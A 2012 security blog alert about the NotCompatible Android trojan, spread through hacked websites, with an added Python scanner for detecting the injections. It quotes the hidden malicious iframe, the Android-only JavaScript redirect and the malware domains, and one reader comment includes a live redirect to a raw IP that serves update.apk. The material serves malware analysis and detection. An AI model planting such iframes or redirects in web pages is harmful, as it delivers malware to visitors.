May 2, 2012

UPDATE: Security Alert: Hacked Websites Serve Suspicious Android Apps (NotCompatible)

Update Two: Based on our current research, NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update. This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy. As previously mentioned, this appears to be the first time that compromised websites have been used to distribute malware targeting Android devices.

Distribution of NotCompatible depends on compromised websites that have a hidden iframe at the bottom of each page. If a user visits a compromised website from an Android device, their mobile web browser will automatically begin downloading the NotCompatible application, named ‘Update.apk’. As with any drive-by download, the user still needs to install the downloaded application before the device is infected. Based on our initial investigation, we’ve confirmed that a number of websites have been compromised. However, affected sites appear to show relatively low traffic and we expect the total impact to Android users to be low.

This specific sample, while relatively well constructed, does not appear to go to great lengths to hide its intended purpose: it can be used to access private networks. This feature in itself could be significant for system IT administrators: a device infected with NotCompatible could potentially be used to gain access to normally protected information or systems, such as those maintained by enterprise or government.

Update: All Lookout users are currently protected against NotCompatible. Lookout protects users from drive-by downloads when the features File System Monitoring and Install Monitoring are active. These additional layers of protection alert users to known threats when they are downloaded to device storage, such as the /Downloads folder on the SD card, and immediately before they are installed via sideloading.

Hacked websites are frequently used to infect PCs with malware; however, today we have identified the first instance of hacked websites being used to specifically target mobile devices. Lookout is in the process of rolling out an update to protect against the new threat, NotCompatible.

How it Works

In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive-by download.

When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app. In order to actually install the app on a device, it must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”). If the device does not have the unknown sources setting enabled, the installation will be blocked.

(Screenshots originally posted by redditor, Georgiabiker)

Technical details

Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style="visibility: hidden; display: none; display: none;"
src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.

When a PC-based web browser accesses the site at gaoanalitics.info, a “not found” error is returned; however, if a web browser with the word “Android” in its User-Agent header accesses the page, the following is returned:

<html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html>

This page causes the browser to immediately attempt to access the page at androidonlinefix.info. Like the previous site, only browsers sending an Android User-Agent string will trigger a download (all other browsers will show a blank page). When this page is visited from an Android browser, the server returns an Android application package, which the Android browser automatically downloads.
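As an added illustration (not Lookout’s code and not part of the original alert), the following Python scanner flags the two page-side patterns described above, a CSS-hidden iframe and a JavaScript top-frame redirect, and also the variant that branches on the browser’s userAgent string; the sample documents, the KNOWN_DOMAINS set, the function names and the placeholder.invalid host are constructed for this example.

```python
import re
from html.parser import HTMLParser
# Constructed samples mirroring the injected iframe and the Android-only
# redirect quoted in the alert (defanged hxxp:// scheme kept as printed).
SAMPLE_PAGE = """<html><body><p>Welcome</p>
<iframe style="visibility: hidden; display: none; display: none;"
src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>
</body></html>"""
SAMPLE_REDIRECT = ('<html><head></head><body><script type="text/javascript">'
                   'window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";'
                   '</script></body></html>')
SAMPLE_UA_CHECK = ('<script>if(navigator.userAgent.toLowerCase().indexOf("android") > -1)'
                   " { top.location = 'hxxp://placeholder.invalid/goo/'; }</script>")  # placeholder host

# Distribution and C&C domains named in the alert.
KNOWN_DOMAINS = {"gaoanalitics.info", "androidonlinefix.info", "notcompatibleapp.eu"}

HIDDEN_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
REDIRECT_JS = re.compile(
    r"(?:window\.)?top\.location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]", re.I)
UA_CHECK = re.compile(r"userAgent[^;]{0,80}android", re.I)

def host_of(url):
    """Hostname of a live or hxxp-defanged URL, lower-cased ('' if unparsable)."""
    m = re.match(r"(?:hxxps?|https?)://([^/?#:]+)", url, re.I)
    return m.group(1).lower() if m else ""

class _HiddenIframes(HTMLParser):
    """Collects the src of every iframe whose inline style hides it."""
    def __init__(self):
        super().__init__()
        self.srcs = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" and a.get("src") and HIDDEN_CSS.search(a.get("style", "")):
            self.srcs.append(a["src"])

def scan_page(html):
    """Return (indicator, url, known_domain) tuples for one HTML document."""
    findings = []
    p = _HiddenIframes()
    p.feed(html)
    for src in p.srcs:
        findings.append(("hidden_iframe", src, host_of(src) in KNOWN_DOMAINS))
    for m in REDIRECT_JS.finditer(html):
        url = m.group(1)
        kind = "ua_conditional_redirect" if UA_CHECK.search(html) else "top_redirect"
        findings.append((kind, url, host_of(url) in KNOWN_DOMAINS))
    return findings
```

A visible iframe or a redirect to an unknown host is still reported with known_domain False, so the tuple can feed a triage rule rather than an alert on its own.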

Suspicious applications are currently served from the following sites:

  • gaoanalitics.info
  • androidonlinefix.info

Command and Control (C&C) domains include:

  • notcompatibleapp.eu

As Lookout identifies the extent of infected websites, we will update this blog post.

The Lookout security team is actively investigating the infected websites and suspicious application. Refer back to this blog post for regular updates on this security alert.

18 comments
  1. Leonidas says:

    thanks for the warning, will be alert


  3. [...] Mobile Security on Wednesday reported that the new Trojan, dubbed “NotCompatible,” which postures as a system update could potentially be used to gain [...]

  4. Rippidip says:

    Does this affect all browsers on Android (Dolphin, Firefox, Chrome, “Robot” etc.) or just the stock browser?

  5. [...] by security company Lookout Mobile Security on a number of websites, the decidedly odd “NotCompatible” Trojan is distributed using a web page containing a hidden [...]


  10. jhon says:

    Security is the most important issue in mobile when using an internet service. Android has uploaded a security service; of course it is essential for safety purposes. Thanks for the service.

  11. [...] Lookout first published information about the new malware, dubbed “NotCompatible,” on Wednesday. Further analysis, however, has revealed the most likely reason why cyber criminals are spreading the malware. [...]

  12. [...] infected [device] into a Proxy”, as the mobile security specialist company explains on its blog. What could be especially harmful is reaching networks [...]

  13. [...] Lookout says the number of affected sites is low at present, so there’s no need to panic just yet, but it’s certainly far from comforting to learn just how devious those behind the malware are becoming. With fake Instagram and Angry Birds Space apps also in the wild, Android users will need to remain vigilant in order to keep their device free of malicious exploits. [...]


  15. Wim Rijksen says:

    I got a mail with no subject today, addressed to a bunch of people, containing only a URL: http://www.adheijnehengelo.nl/wp-content/plugins/zaeuxuoueen/biokrls.html?aba=shxaps
    Opening this on my Android device, it downloaded update.apk, which I did not install.
    The document (biokrls.html) contained this:

    if(navigator.userAgent.toLowerCase().indexOf("android") > -1) { top.location = 'http://194.60.242.54/goo/'; }

    You are here because one of your friends have invited you.
    Page loading, please wait….

  16. @Wim, thanks for the report!

